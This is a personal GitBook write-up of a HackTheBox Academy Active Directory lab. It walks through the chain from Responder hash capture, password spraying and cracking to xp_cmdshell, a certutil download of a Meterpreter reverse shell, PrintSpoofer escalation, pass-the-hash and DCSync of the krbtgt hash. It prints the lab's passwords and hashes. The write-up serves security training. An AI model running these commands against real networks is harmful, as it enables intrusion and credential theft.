Hack-notes
  • Whoami
  • MalDev
    • Reflective loader
  • Academy HackTheBox
    • Attacking Common Applications
      • Attacking Common Applications - Skills Assessment I
      • Attacking Common Applications - Skills Assessment II
      • Attacking Common Applications - Skills Assessment III
    • Attacking Common Services
      • Attacking Common Services - Easy
      • Attacking Common Services - Medium
      • Attacking Common Services - Hard
    • AD Enumeration & Attacks - Skills Assessment Part I
    • AD Enumeration & Attacks - Skills Assessment Part II
  • HackTheBox-writeups
    • Machines
      • Windows
        • Jab
      • Linux
        • ICLEAN
  • CheatSheet
    • AD
      • linux
      • Windows
      • Bloodhound cypher query
      • Powerview
    • Privilege Escalation
      • Linux
      • Windows
    • Payloads (Reverse shell)
    • Post-Exploitation
      • Windows
    • CLM and Applocker Bypass
  • Your Path to the OSCP+
  • Pwning OSEP with `secrets.txt` on my first attempt
Powered by GitBook
On this page

Was this helpful?

  1. Academy HackTheBox

AD Enumeration & Attacks - Skills Assessment Part II

We already have SSH access to the internal network via a Parrot Linux VM without any credentials. Our objective is to compromise the Active Directory by gaining access to it and obtaining the krbTGT hash.

Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?

First i ran an Nmap scan and used responder to capture any NTLM hash

nmap -T4 -A 172.16.6.0/23 -oN nmap_scan.txt &
responder -I ens24&

At the moment of enumeration. i determined the IP address of the domain controller by using 'nslookup'. Then i attempted to check for any null sessions in SMB or rpcclient, but no success. Subsequently i resorted to using ldapsearch to gather information from LDAP initiating the command as follows:

ldapsearch -x -h 172.16.7.3 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=INLANEFREIGHT,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

and i try to gather more informations like users,computers.. by using this command:

ldapsearch -h 172.16.7.3 -x -s base -b '' "(objectClass=*)" "*" +                                                                                                                                                                     
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: * + 
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=INLANEFREIGHT,DC=LOCAL
ldapServiceName: INLANEFREIGHT.LOCAL:dc01$@INLANEFREIGHT.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC
 =LOCAL
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
 ation,DC=INLANEFREIGHT,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: DC=INLANEFREIGHT,DC=LOCAL
namingContexts: CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=INLANEFREIGHT,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 94362
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
 CN=Sites,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
dnsHostName: DC01.INLANEFREIGHT.LOCAL
defaultNamingContext: DC=INLANEFREIGHT,DC=LOCAL
currentTime: 20240318110728.0Z
configurationNamingContext: CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

I specified 'objectClass: person' here to see if I could obtain any valid users.

ldapsearch -h 172.16.7.3 -x -b "DC=INLANEFREIGHT,DC=LOCAL" '(objectClass=Person)'

And finally i obtained the Nmap results:

Nmap scan report for inlanefreight.local (172.16.7.3)
Host is up (0.040s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-18 21:44:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:c9:44 (VMware)
| smb2-time: 
|   date: 2024-03-18T21:44:06
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: -1s

Nmap scan report for 172.16.7.50
Host is up (0.040s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-18T21:44:16+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=MS01.INLANEFREIGHT.LOCAL
| Not valid before: 2024-03-17T21:40:47
|_Not valid after:  2024-09-16T21:40:47
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: MS01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:7c:72 (VMware)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-03-18T21:44:08
|_  start_date: N/A

Nmap scan report for 172.16.7.60

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds?

1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM

|_ssl-date: 2024-03-18T17:45:52+00:00; 0s from scanner time.

| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback

| Not valid before: 2024-03-18T17:20:37

|_Not valid after: 2054-03-18T17:20:37

| ms-sql-ntlm-info:

| Target_Name: INLANEFREIGHT

| NetBIOS_Domain_Name: INLANEFREIGHT

| NetBIOS_Computer_Name: SQL01

| DNS_Domain_Name: INLANEFREIGHT.LOCAL

| DNS_Computer_Name: SQL01.INLANEFREIGHT.LOCAL

| DNS_Tree_Name: INLANEFREIGHT.LOCAL

|_ Product_Version: 10.0.17763

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-security-mode:

| 3.1.1:

|_ Message signing enabled but not required

|_nbstat: NetBIOS name: SQL01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:ce:a5 (VMware)

| ms-sql-info:

| Windows server name: SQL01

| 172.16.7.60\SQLEXPRESS:

| Instance name: SQLEXPRESS

| Version:

| name: Microsoft SQL Server 2019 RTM

| number: 15.00.2000.00

| Product: Microsoft SQL Server 2019

| Service pack level: RTM

| Post-SP patches applied: false

| TCP port: 1433

|_ Clustered: false

| smb2-time:

| date: 2024-03-18T17:45:47

|_ start_date: N/A

So we have:

  • Domain Controller (DC) with IP address: 172.16.7.3

  • MS01 host with IP address: 172.16.7.50

  • SQL01 server with IP address: 172.16.7.60

After finishing the analysis i noticed that I obtained a hash of a user. Do you remember the Responder tool we started with initially? The hashes are saved in "/usr/share/responder/logs/SMB-NTLMv2-SSP-IpTarget". Now all we need to do is crack this NTLMv2 hash using hashcat.

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt 

i successfully retrieved the password for the user.

What is this user's cleartext password?

The response to the first question is the cracked NTLM hash.

Submit the contents of the C:\flag.txt file on MS01

Now that we have the credentials of that user we can use CrackMapExec to determine which protocol we can use to obtain a shell.

$crackmapexec smb 172.16.7.50 -u 'AB920' -p 'weasal'                                          
#nothing happen
                                                                                                                                                                                                                                            
$crackmapexec winrm 172.16.7.50 -u 'AB920' -p 'weasal' 
SMB         172.16.7.50     5985   MS01             [*] Windows 10.0 Build 17763 (name:MS01) (domain:INLANEFREIGHT.LOCAL)
HTTP        172.16.7.50     5985   MS01             [*] http://172.16.7.50:5985/wsman
WINRM       172.16.7.50     5985   MS01             [+] INLANEFREIGHT.LOCAL\AB920:weasal (Pwn3d!)

As you can see we can use WinRM on MS01. Therefore we'll use Evil-WinRM because i prefer it over Impacket-WMIExec as it offers more features such as download and upload capabilities ..etc

evil-winrm 172.16.7.50 -u '' -p ''

and got the flag

Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

I've attempted several techniques here but none have worked and i'm reconsidering whether the question implies performing a password spray attack so let's check the lockout threshold on the account to understand how many attempts we have before the account gets locked out.

*Evil-WinRM* PS C:\Users\AB920\Documents> net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              1
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        SERVER
The command completed successfully.

So we don't have a specific number meaning we can spray passwords as often as we want. However let's focus on setting a weak password and spraying it across all user accounts. To obtain a list of users in the domain we can use the credentials of the compromised user with the following command:

crackmapexec smb 172.16.7.50 -u 'AB920' -p 'weasal' --users

to build a simple world listI initially used the top 20 common passwords

123456
123456789
12345
qwerty
password
12345678
111111
123123
1234567890
1234567
qwerty123
000000
1q2w3e
aa12345678
abc123
password1
1234
qwertyuiop
123321
password123

All of these passwords failed i then tried a wordlist containing the top 1-1000 common passwords, which I found on Wikipedia and it worked.

kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 users_valid.txt password.txt

and this the user a got the user "BR086"

What is this user's password?

The passwords were discovered in the previous question using Kerbrute.

Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

"I used the credentials of the user "BR086" to enumerate all shared files over the network so for this task i employed my favorite tool "smbmap".

smbmap -u BR086 -p Welcome1 -H 172.16.7.3                                                                                                                                                                                             
[+] IP: 172.16.7.3:445  Name: inlanefreight.local                               
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        Department Shares                                       READ ONLY       Share for department users
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

So let's enumerate each directory. To simplify this process i continue using the same tool which is why I prefer it. I'll start with the 'netlogon' directory.

smbmap -u BR086 -p Welcome1 -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R NETLOGON                                                                                                                                                          
[+] IP: 172.16.7.3:445  Name: inlanefreight.local                               
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        NETLOGON                                                READ ONLY
        .\NETLOGON\*
        dr--r--r--                0 Fri Apr  1 10:44:02 2022    .
        dr--r--r--                0 Fri Apr  1 10:44:02 2022    ..

nothing special and i move to "Department Shares"

smbmap -u BR086 -p Welcome1 -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R "Department Shares"
[+] IP: 172.16.7.3:445  Name: inlanefreight.local                               
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Department Shares                                       READ ONLY
        .\Department Shares\*
        dr--r--r--                0 Fri Apr  1 11:04:17 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:17 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    Accounting
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    Executives
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    Finance
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    HR
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    IT
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    Marketing
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    R&D
        .\Department Shares\Accounting\*
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:17 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:54 2022    Public
        .\Department Shares\Executives\*
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:15 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:49 2022    Public
        .\Department Shares\Finance\*
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:12 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:43 2022    Public
        .\Department Shares\HR\*
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:04 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:27 2022    Public
        .\Department Shares\IT\*
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:22 2022    Public
        .\Department Shares\IT\Private\*
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    Development
        .\Department Shares\IT\Private\Development\*
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    ..
        fr--r--r--             1203 Fri Apr  1 11:05:02 2022    web.config
        .\Department Shares\Marketing\*
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:10 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:38 2022    Public
        .\Department Shares\R&D\*
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:07 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:33 2022    Public

i discovered a suspicious file named 'web.config' in the 'netlogon' directory. Upon downloading it i found credentials of a user. you can download the file with any command you prefer. As always i used smbmap for this task.

smbmap -u BR086 -p Welcome1 -R Department Shares -H 172.16.7.3 -A web.config -q

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

i used MSSQL to authenticate with the user obtained credentials using the following commands.

mssqlclient.py INLANEFREIGHT/netdb@172.16.7.60                                                                                                                  
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SQL01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> xp_cmdshell

and i run "whoami /priv" and i found these juicy privileges

SQL> xp_cmdshell "whoami /priv"
output                                                                             

--------------------------------------------------------------------------------   

NULL                                                                               

PRIVILEGES INFORMATION                                                             

----------------------                                                             

NULL                                                                               

Privilege Name                Description                               State      

============================= ========================================= ========   

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   

SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   

SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    

SeImpersonatePrivilege        Impersonate a client after authentication Enabled    

SeCreateGlobalPrivilege       Create global objects                     Enabled    

SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled   

NULL 

We're aware that we can exploit the "SeImpersonatePrivilege" privilege with various exploits. In my case i exploited it using the printSpooler to obtain a shell as "nt authority\system". To do this i generated a reverse tcp shell with msfvenom using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=4444 -f exe > shell.exe 

I utilized Meterpreter to facilitate transferring files and also dumping hashes with the 'include' option and i downloaded the 'printSpooler.exe' and 'shell.exe' files to the target machine "SQL01" using the following command:

SQL> xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240/PrintSpoofer.exe c:\users\Public\PrintSpoofer.exe"
SQL> xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240/reverse_shell.exe  c:\users\Public\shell.exe"

and after running the exploit i use multi/handler in vm parote the attacker machine and than running the exploit

xp_cmdshell c:\users\Public\PrintSpoofer.exe -c "c:\users\Public\reverse_shell.exe"

and we will get the shell

[*] Started reverse TCP handler on 172.16.7.240:4444 
[*] Sending stage (200262 bytes) to 172.16.7.60
[*] Meterpreter session 1 opened (172.16.7.240:4444 -> 172.16.7.60:56938 ) at 2024-03-18 14:30:56 -0400

meterpreter > shell
Process 5580 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.2628]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami  
whoami
nt authority\system

so you can read the flag

Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

Here i simply dumped the hash using the 'hashdump' option in Meterpreter which provided me with the administrator hash.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bdaffbfe64f1fc646a3353be1c2c3c99:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4b4ba140ac0767077aee1958e7f78070

and i use it to see if we can pass it to access to MS01 host using crackmapexec

crackmapexec winrm 172.16.7.50 -u Administrator -H bdaffbfe64f1fc646a3353be1c2c3c99                                                                             
WINRM       172.16.7.50     5985   NONE             [*] None (name:172.16.7.50) (domain:None)
WINRM       172.16.7.50     5985   NONE             [*] http://172.16.7.50:5985/wsman
WINRM       172.16.7.50     5985   NONE             [+] None\Administrator:bdaffbfe64f1fc646a3353be1c2c3c99 (Pwn3d!)

Boom! It worked. We can use the hash to gain access to the host so let's use Evil-WinRM as always.

evil-winrm -i 172.16.7.50 -u Administrator -H bdaffbfe64f1fc646a3353be1c2c3c99

and you can read the flag

Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?

i run SharpHound

.\SharpHound.exe -c ALL --zipfilename enum

Then i downloaded it to my Kali machine and extracted it, to use GUI version of BloodHound. iselected 'Find Shortest Paths to Domain Admins'.

so the answer is "GT059" user

Crack this user's password hash and submit the cleartext password as your answer.

Here i attempted to use Mimikatz to extract any credentials from memory but it did not work. Then i recalled the functionality of 'Inveigh.exe' which is similar to Responder in Linux so downloaded it to MS01.

Evil-WinRM* PS C:\Users\Administrator\Desktop> upload Inveigh.exe
Info: Uploading Inveigh.exe to C:\Users\Administrator\Desktop\Inveigh.exe

let's capture some ntlm ticket

.\Inveigh.exe

boom we capture the NTLMv2 of the user "CT059" so we need just to crack it now

*Evil-WinRM* PS C:\Users\Administrator\Desktop> .\Inveigh.exe
[*] Inveigh 2.0.4 [Started 2024-03-18T15:27:50 | PID 2856]
[+] Packet Sniffer Addresses [IP 172.16.7.50 | IPv6 fe80::190a:5243:cf28:df7a%5]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 172.16.7.50 | IPv6 fe80::190a:5243:cf28:df7a%5]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[ ] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Users\Administrator\Desktop]
[+] Previous Session Files (Not Found)
[*] Press ESC to enter/exit interactive console
[.] [15:28:51] TCP(5985) SYN packet from 172.16.7.240:37138
[.] [15:28:51] TCP(5985) SYN packet from 172.16.7.240:37140
[.] [15:29:27] TCP(445) SYN packet from 172.16.7.3:62200
[.] [15:29:27] SMB1(445) negotiation request detected from 172.16.7.3:62200
[.] [15:29:27] SMB2+(445) negotiation request detected from 172.16.7.3:62200
[+] [15:29:27] SMB(445) NTLM challenge [F727C1E3FFDFA0B9] sent to 172.16.7.50:62200
[+] [15:29:27] SMB(445) NTLMv2 captured for [INLANEFREIGHT\CT059] from 172.16.7.3(DC01):62200:
CT059::INLANEFREIGHT:F727C1E3FFDFA0B9:22DB0E58D4BF6ACE486836CFB47D51D0:010100000000000094EE3FF97279DA0102BEE3F4CABE37750000000002001A0049004E004C0041004E0045004600520045004900470048005400010008004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C00030030004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000700080094EE3FF97279DA01060004000200000008003000300000000000000000000000002000002C16FB4DD923C41EF793B8F89EE541E3A6576D4FCD6FDD38AFE3F5F519AA000A0A001000000000000000000000000000000000000900200063006900660073002F003100370032002E00310036002E0037002E0035003000000000000000000000000000

i use hashcat to crack the NTLMv2 hash

hashcat -m 5600 hash -w ./rockyou.txt

I've got the password

Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

So we need to add any compromised user whose credentials we have to the Domain Admins group with the 'GenericAll' ability in my case i will add user 'AB920' and still have a session on the SQL01.inlanefreight host. You can execute these commands on the MS01 host it will work the same way.

PS C:\Windows\system32> $SecPassword = ConvertTo-SecureString 'charlie1' -AsPlainText -Force
PS C:\Windows\system32> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\CT059', $SecPassword)

so i upload PowerView into this host using download option in meterpreter

Import-Module PowerView.ps1
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'AB920' -Credential $Cred

if we check the if the user was added to Domain Admins group

PS C:\Users\public> Get-DomainGroupMember -Identity 'Domain Admins'
Get-DomainGroupMember -Identity 'Domain Admins'


GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : AB920
MemberDistinguishedName : CN=AB920,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3327542485-274640656-2609762496-4610

GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3327542485-274640656-2609762496-500

and it's work we can now perform DCsync and retrieve ktbTGT hash

Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.

in my case i use just simply secretsdump

secretsdump.py -just-dc AB920:weasal@172.16.7.3 -outputfile dcsync_hashes                                                                                       
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:234a798328eb83fda24119597ffba70b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7eba70412d81c1cd030d72a3e8dbe05f:::

I didn't specify the user from which I want to get the hash. You can add " -just-dc-user inlanefreight/krbtgt" to specify.

PreviousAD Enumeration & Attacks - Skills Assessment Part INextHackTheBox-writeups

Last updated 1 year ago

Was this helpful?

Enumerating shortest path do domain admins